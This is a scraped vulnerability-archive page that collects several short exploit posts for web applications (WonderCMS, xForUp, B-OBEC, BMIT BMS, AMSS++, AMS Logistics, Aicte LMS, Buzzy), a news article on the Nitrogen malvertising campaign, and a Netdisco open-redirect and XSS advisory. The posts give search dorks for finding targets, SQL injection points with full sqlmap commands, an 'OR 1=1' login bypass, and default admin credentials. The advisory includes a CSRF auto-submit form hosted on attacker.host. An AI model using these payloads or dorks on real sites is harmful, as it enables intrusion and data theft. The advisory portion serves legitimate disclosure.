WonderCMS version 0.6-Beta suffers from a password disclosure vulnerability.

    ====================================================================================================================================| # Title     : WonderCMS v0.6-Beta Password Disclosure Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://wondercms.com/                                                                                              || # Dork      : ©2015 Your website | Powered by WonderCMS | Login                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] /files/password[+] http://127.0.0.1/wondercms/files/passwordGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WonderCMS 0.6-Beta Password Disclosure

xForUp Simple File Uploader version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : xForUp simple file uploader V1.0 Sql injection Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://github.com/munafaqeelmahdi/xForUp-simple-file-uploader-with-php                                            |  ====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  http://127.0.0.1/pages.php?page=17 <======| inject here[+]  Panel : http://127.0.0.1/admin/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

xForUp Simple File Uploader 1.0 SQL Injection

B-OBEC version V.092019 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : B-OBEC V.092019 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://bobec.bopp-obec.info/                                                                                      |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /area_user.php?Area_CODE=1001[+] D:\sqlmap>sqlmap.py -u https://target_site/area_user.php?Area_CODE=1001 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbsGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

B-OBEC V.092019 SQL Injection

BMIT BMS version 2.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : BMIT BMS 2.1 Auth BY Pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.bmitsolution.in/softtware_development.php                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass : ADMIN' OR 1=1#[+] http://127.0.0.1/wwrbsgroupofinstitutioncom/admin/index.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

BMIT BMS 2.1 SQL Injection

AMSS++ version 5.21.09 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : AMSS++ V5.21.09 JT SQL injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_full_update_5_21.rar                                         |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules/mail/main/maildetail.php?id=174 <===== inject here D:\sqlmap>sqlmap.py -u https://127.0.0.1/amss.ictkan2com/modules/mail/main/maildetail.php?id=174 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D admin_amssGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AMSS++ 5.21.09 SQL Injection

AMS Logistics version 2.2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : AMS LOGISTICS 2.2 SQL injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.amslogistics.co.th/#software                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /ai_news_read.php?l_id=AMS23050001 <===== inject here [+] https://127.0.0.1/wtheailogisticscom/ai_news_read.php?l_id=AMS23050001Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AMS Logistics 2.2 SQL Injection

Aicte India LMS version 3.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Aicte india LMS 3.0 SQL injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://codecanyon.net/                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /committee.php?n=ANTI-RAGGING <===== inject here [+] D:\sqlmap>sqlmap.py -u http://vtcbcsreduin/committee.php?n=ANTI-RAGGING  --tables -D vcbtanyb_auctionGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Aicte India LMS 3.0 SQL Injection

Buzzy News Viral Lists Polls and Videos version 2.5.1 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings**

Posted Jul 27, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.5.1 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | 5ed91b51bdf7efaa67ae9bf7fba6a1066c2ab71217d47b8a8ad0b9d7d469dbaa

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings**

    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.5.1 Insecure Settings Vulnerability                                    || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                              || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,789)
*   Arbitrary (16,166)
*   BBS (2,859)
*   Bypass (1,736)
*   CGI (1,025)
*   Code Execution (7,248)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,336)
*   DoS (23,383)
*   Encryption (2,365)
*   Exploit (51,681)
*   File Inclusion (4,215)
*   File Upload (969)
*   Firewall (821)
*   Info Disclosure (2,758)
*   Intrusion Detection (891)
*   Java (3,037)
*   JavaScript (851)
*   Kernel (6,656)
*   Local (14,442)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,140)
*   Proof of Concept (2,338)
*   Protocol (3,584)
*   Python (1,531)
*   Remote (30,691)
*   Root (3,577)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,878)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,324)
*   TCP (2,398)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,727)
*   Web (9,624)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,882)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,797)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,284)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,612)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,780)
*   UNIX (9,271)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.5.1 Insecure Settings

A new malvertising campaign has been observed leveraging ads on Google Search and Bing to target users seeking IT tools like AnyDesk, Cisco AnyConnect VPN, and WinSCP, and trick them into downloading trojanized installers with an aim to breach enterprise networks and likely carry out future ransomware attacks.
Dubbed Nitrogen, the "opportunistic" activity is designed to deploy second-stage

Malvertising / Software Security

A new malvertising campaign has been observed leveraging ads on Google Search and Bing to target users seeking IT tools like AnyDesk, Cisco AnyConnect VPN, and WinSCP, and trick them into downloading trojanized installers with an aim to breach enterprise networks and likely carry out future ransomware attacks.

Dubbed **Nitrogen**, the "opportunistic" activity is designed to deploy second-stage attack tools such as Cobalt Strike, Sophos said in a Wednesday analysis.

Nitrogen was first documented by eSentire in June 2023, detailing an infection chain that redirects users to compromised WordPress sites hosting malicious ISO image files that ultimately culminate in the delivery of Python scripts and Cobalt Strike Beacons onto the targeted system.

Then earlier this month, Trend Micro uncovered a similar attack sequence in which a fraudulent WinSCP application functioned as a stepping stone for a BlackCat ransomware attack.

"Throughout the infection chain, the threat actors use uncommon export forwarding and DLL preloading techniques to mask their malicious activity and hinder analysis," Sophos researchers Gabor Szappanos, Morgan Demboski, and Benjamin Sollman said.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

The Python scripts, once launched, establish a Meterpreter reverse TCP shell, thereby allowing threat actors to remotely execute code on the infected host, as well as download a Cobalt Strike Beacon to facilitate post-exploitation.

"Abuse of pay-per-click advertisements displayed in search engine results has become a popular tactic among threat actors," the researchers said. "The threat actors are trying to cast a wide net to lure unsuspecting users seeking certain IT utilities."

The findings also come against the backdrop of a spike in cybercriminals using paid advertisements to lure users to malicious sites and trick them into downloading a variety of malware such as BATLOADER, EugenLoader (aka FakeBat), and IcedID, which are then used to spread information stealers and other payloads.

To make matters worse, Sophos said it found on prominent criminal marketplaces a "significant number of advertisements for, and discussion about, SEO poisoning, malvertising, and related services" as well as sellers offering compromised Google Ads accounts.

This illustrates that "marketplaces users have a keen interest in SEO poisoning and malvertising" and that "it also negates the difficulty of trying to bypass email filters and convincing users to click a link or download and open an attachment."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Malvertising Campaign Distributing Trojanized IT Tools via Google and Bing Search Ads

Netdisco before v2.063000 was discovered to contain an open redirect vulnerability. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking the victim users to click on crafted links.

**Netdisco-CVE-2023-37624****Description**

Netdisco before version 2.063000 was found to contain an open redirect vulnerability due to insufficient validation of an input parameter. An attacker may exploit this vulnerability to redirect users to arbitrary web URLs by tricking them into clicking on a specially crafted link.

**Technical Details**

If a user attempts to access a page within Netdisco without a valid session, they are redirected to the login page. Once logged in, the user will be redirected to the page they originally attempted to visit. Insufficient validation of the original url allows a malicious actor to specify an arbitrary URL in the original GET request to the login page.

To reproduce the vulnerability the following URL may be provided:

    http://netdiscoexample.host///www.google.com
    

This will redirect the user to Google after the login process is complete.

**Netdisco-CVE-2023-37623****Description**

Netdisco before version 2.063000 was found to contain multiple stored cross-site scripting (XSS) vulnerabilities. An attacker may exploit this to perform unauthorised actions on behalf of a user.

**Technical Details**

A stored Cross-Site Scripting vulnerability was discovered in the main search box of the web applicaiton. This vulnerability is the result of insufficient sanitisation of the System Name device field. When a search for a device is performed by typing in an IP address, once at least three characters are entered in the search bar matching device System Names are presented in a drop down list by the typeahead feature. If the System Name contains HTML tags, the browser will interpret the contents as valid HTML.

To reproduce the vulnerability, perform the following steps:

1.  Log in to Netdisco as an administrator.
2.  Go to the admin dropdown menu and select Pseudo Devices.
3.  Enter any IPV4 address as the Device IP (eg. 192.168.0.1), then enter the Device Name below, and click the Add button.

    <script>alert(1)</script>
    

4.  Then in the main search box containing the text "Find Anything", enter the first three numbers of the Device IP (i.e. 192).
5.  Observe that the alert box has executed.

Note: There are other ways to inject a payload into the System Name without creating a pseudo device and requiring an admin login.

For example an attacker may set up SNMP on their machine and inserts a Java Script payload as the Device Name, as in the configuration file below:

To inject the payload into Netdisco it is possible to submit a discovery request for the attacker controlled IP. This can be done by enticing an administrator with a valid session can be enticed into clicking on a link that utilises the Open Redirect vulnerability from CVE 2023-37624, for example; 'https://netdiscoexample.host///attacker.host/csrf.html', where netdiscoexample.host is the Netdisco URL and attacker.host/csrf.html hosts the following HTML:

<body onload\="document.form.submit()"\>
   <form action\="https://netdiscoexample.host/admin/discover?device=attackerIP" method\="POST" name\="form" style\="display;none;"\>
</form\>
</body\>

If the administrator clicks on this link then attacker's machine will be discovered and the payload loaded through SNMP and executed when the IP is entered in the search bar, as in the screenshot below.

An additional stored Cross-Site Scripting vulnerability was found in the Job Queue page. This vulnerability is the result of insufficient sanitisation of the Param job field.

To reproduce the vulnerability, perform the following steps:

1.  Log into Netdisco as an administrator.
2.  Go to the Inventory page and open any device. If a device is not present, then add a Pseudo Device as above.
3.  Click in the contact field and enter the following text:

    <script>alert(1)</script>
    

4.  Go to the Admin dropdown menu and select Job Queue.
5.  Esnure the job has a Status of "Done", then hover the mouse point over the Param field containing the text "<script>alert(1)</script>".
6.  Observe that the alert box has executed.

Tag

#google